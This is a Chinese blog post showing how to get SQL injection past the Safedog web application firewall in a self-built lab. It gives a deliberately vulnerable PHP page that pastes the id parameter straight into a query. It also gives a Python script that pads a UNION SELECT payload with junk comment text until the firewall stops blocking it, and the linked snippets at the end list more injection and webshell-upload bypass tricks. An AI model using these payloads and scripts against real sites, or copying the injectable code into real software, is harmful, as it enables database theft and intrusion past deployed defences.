mysql特性绕过安全狗_sql注入绕过安全狗waf

最新推荐文章于 2021-07-24 10:36:17 发布
最新推荐文章于 2021-07-24 10:36:17 发布
阅读量194 收藏
点赞数
文章标签: mysql特性绕过安全狗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28816215/article/details/113631331
版权

看了某个师傅sql注入绕过安全狗waf的文章,自己搭建平台重现一番。

环境部署

安装phpstudy:

cc1ff67e50e4

安全狗关闭CC:

cc1ff67e50e4

靶机代码和POC

创建test数据库:

cc1ff67e50e4

靶机代码:<?php

$db_host = 'localhost';

$db_name = 'root';

$db_user = 'root';

$db_pwd = '123456';

//面向对象方式

$mysqli = new mysqli($db_host, $db_user, $db_pwd);

//面向对象的昂视屏蔽了连接产生的错误,需要通过函数来判断

if(mysqli_connect_error()){

echo mysqli_connect_error();

}

//设置编码

$mysqli->set_charset("utf8");//或者 $mysqli->query("set names 'utf8'")

echo "连接成功";

mysqli_select_db($mysqli,'test');

$id=$_REQUEST['id'];

$query="SELECT * FROM users WHERE id =$id";

$result=mysqli_query($mysqli,$query);

while($row=mysqli_fetch_array($result,MYSQLI_NUM))

{

echo $row[0]." ".$row[1];

echo "
";

}

echo "
";

echo $query;

//关闭连接

$mysqli->close();

?>

访问:localhost/sql.php?id=1

cc1ff67e50e4

经测试发现常规的注入方式会被拦截

cc1ff67e50e4

因为对于软waf,如果提交的数据量过多。就会直接扔到后端去处理

get不能提交过多的数据,所以用post写了个简单的python脚本,通过叠加无用的字符,并检测是否绕过waf,我们的payload  1 /*无用的字符*/  union select user(),2

附上poc代码:import requests

url = "http://localhost/sql.php"

headers = {

"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"

}

try:

for i in range(1,2999):

st = "/*"+"ABC"*i+"*/ union select user(),2"

data={

"id":"1 %s " %st

}

print(i)

res= requests.post(url,headers=headers,data=data).text

print(data)

print(res)

if res.find("cax")!=-1:

print(i)

break

except:

print('终止执行')

运行结果:

在ABC*2562的时候成功了绕过了安全狗结果。

cc1ff67e50e4

绕过成功!!!

如果没有绕过狗的res的内容:

cc1ff67e50e4

将payload放在burp上验证下:

这里的burp注意是post请求方式,可以通过抓包抓到get请求的包放到Repeat下,然后右键change request method来更改成post请求:

cc1ff67e50e4

直接使用ABC*2562这个payload对于返回的请求包如果是500error或者internet server error当时以为是我的服务配置问题,没想到再加几十个ABC进去后,就绕过了waf

LaserComposites
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql特性绕过安全狗_网站安全狗webshell防御功能完全绕过(多种方法/适用于多种语言环境)...
weixin_39673972的博客
02-02 152
测试环境:win2008+php5+mysql5+apache+最新下载安全狗首先第一种针对windows的绕过:首先直接上传一个webshell,没有任意修改下肯定被拦截然后修改webshell内容为1111,还是被拦截,发现这不是重点,重点是文件名为1.php这被检测到了然后我们对文件名fuzz,发现如果split “.”这个字符如果出现php也会被拦截,例如:1.xxx.php.aaax.d...
mysql特有的特性绕过_从偶然的机会发现一个mysql特性到wooyun waf绕过
weixin_39667797的博客
01-28 88
从偶然的机会发现一个mysql特性到wooyun waf绕过题MayIKissYou | 2015-06-19 12:00最近在测试的时候,偶然的机会发现了一个mysql特性,为啥是偶然的机会呢。。。。。一次测试的过程中我在mysql的console下做了如下的操作:看出些什么了么?我当时发现报错的时候例如-+{等符号 报错的时候提示的是''(双引号里没东西),但是如select后面添加1 a等...
mysql特有的特性绕过_waf绕过:基于mysql特性waf绕过技巧小总结
weixin_39988888的博客
01-20 173
研究过国内外的waf。分享一些 奇淫绝技。一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。Mysqltips1: 神奇的 ` (格式输出表的那个控制符)过空格和一些正则。mysql> select`version`();+———————-+|`version`()|+———————-+|5.1.50-commu...
mysql特有的特性绕过_通用的关于sql注入绕过技巧(利用mysql特性
weixin_39978696的博客
01-21 206
1直接上语法2select*fromuserswhereid=8E0unionselect1,2,3,4,5,6,7,8,9,03select*fromuserswhereid=8.0unionselect1,2,3,4,5,6,7,8,9,04select*fromuserswhereid=\Nunionselect1,2,3,4,5,6,7,8...
xxx.rar_injection xxx_injectionxxx_injection视频xxx_sql_sql注入文档
09-20
SQL注入是一种常见的网络安全威胁,广泛存在于Web应用程序中。它允许攻击者通过在输入字段中插入恶意SQL代码,来操纵或窃取数据库中的敏感信息。在这个名为"xxx.rar_injection xxx_injectionxxx_injection视频xxx_...
那些年我们绕过WAF
05-07
描述中提到,本文总结了WAF绕过的方法,旨在帮助测试人员在进行安全性测试时,能够有效地绕过WAF的限制。 以下是一些具体的绕过WAF的策略和技术: 1. **编码转换**: - **URL编码**:攻击者可以使用URL编码来隐藏...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
SQL注入攻击中,我们需要了解数据库的特性,如 MySQL、SQL Server、Oracle 等数据库管理系统的注释符、空白符、特殊符号等。例如,在 MySQL 中,注释符有三种:#、/*...*/、-- ;空格符有多种,如[0x09,0x0a-0x0d...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
最新发布
10-18
SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟注入、错误注入等,来判断目标应用程序是否存在SQL注入漏洞,并且可以绕过WAF的检测。这些脚本是基于不同的数据库系统(如MySQL、PostgreSQL、Oracle等)的...
sqlmap中文手册-sql注入自动化测试工具
07-19
此外,SQLMap还具备绕过WAF(Web应用防火墙)的能力,提高了在复杂环境下的成功率。 在保持工具最新性方面,用户可以通过官方GitHub仓库获取最新版本,了解更新日志,确保使用的始终是最先进的工具。同时,社区的...
绕过安全狗进行sql注入MySQL
热门推荐
一个安全研究员
07-31 1万+
过狗啦
sql注入100种姿势过waf(二):过安全狗
weixin_30455365的博客
06-06 1016
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6 1.首先判断是否有注入点包括是字符型还是数字型注入 我们假设他是数字型注入 构造 id=0=0 在数据库中执行 获取了全部数据 从返回的数据 我...
mysql绕过waf_waf绕过的技巧
weixin_39609503的博客
02-19 238
研究过国内外的waf。分享一些奇淫绝技。一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。Mysqltips1: 神奇的 ` (格式输出表的那个控制符)过空格和一些正则。mysql> select`version`()-> ;+----------------------+| `version`() ...
WAF原理及绕过(成功绕过某狗)
weixin_44174581的博客
07-24 360
绕过截图 测试网站sqli-labs/Less-11,hackbar被拦截,burp成功绕过报错 原理解析 https://blog.csdn.net/qq_36119192/article/details/90113167 https://www.freebuf.com/news/193659.html
mysql 注入关键字waf_SQL注入中的WAF绕过技术
weixin_29015899的博客
02-18 210
作者:bystander博客:http://leaver.me论坛:法克论坛目录1.大小写绕过2.简单编码绕过3.注释绕过4.分隔重写绕过5.Http参数污染(HPP)6.使用逻辑运算符or /and绕过7.比较操作符替换8.同功能函数替换9.盲注无需or和and10.加括号11.缓冲区溢出绕过1. 大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Uni...
MySQL联合注入基于安全狗WAF绕过详情
m0_50211409的博客
04-08 539
WAF是指Web应用防护系统(网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。F5是提供WAF产品和服务的国际厂商,F5 WAF 新品ASM. APM, Edge Gateway全新亮相。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 测试环境:东塔学院SQL注入绕过安全狗 https://labs.do-ta.com/index/course/detail/id/29 测试工
可疑入站mysql_记一次绕过安全狗的教育网站渗透
weixin_31260665的博客
02-05 181
作者:我想学安全来源:https://xz.aliyun.com/t/9025前言:此次渗透测试较为基础,有很多不足的地方,希望各位大佬能够指正首先打开学校的官网:http://www.xxxx.edu.cn嗯,直接干。。。这里直接进行子站查找,一般主站不会让你打进去的(大佬当我没说 ^..^),进行了一番查找,找到了一个学校的图书馆系统需要学号和密码, 学号一般通过谷歌语法来搜集就可以, 默认...
封神台——WAF绕过
Zichel77的博客
07-04 613
没看到id,还是点进一篇新闻看看,因为新闻的页面是和新闻网站数据库产生交互的 是你呀id 是网站下的shownews.asp这个ASP动态网页文件,与数据库进行交互,并查询出了第171篇(id=171)新闻内容的值。 按照上次的老套路 准备来手工注入,构造 and 1=1 我人都要被吓尿了,感觉自己是不是会被请去喝茶 但是毕竟是练习,已经提醒了会有waf拦截,但是他只阻碍了传参中的一些参数,刚刚的and就被禁了 那我试一下不用and 注意,此题使用的是Access数据库,与MyS..
PHP连接数据库与获取参数的方法
宇智波带土
09-09 785
<?php //1.数据库配置 $db_host = "localhost" ; $db_user = "root" ; $db_pass = "123456" ; $db_name = "demo1" ; $charset = "utf8" ; //2.php连接sql服务器 $link = @mysqli_connect...
"SQL注入WAF绕过技术研究
SQL_BypassWaf.pdf是一篇关于WAF绕过技术的研究文章,作者是来自ms509团队的...文章通过对WAF的研究,展示了如何通过SQL注入等技术绕过WAF的防护,实现对目标系统的攻击,进一步提升了攻击者在网络安全领域的实战能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值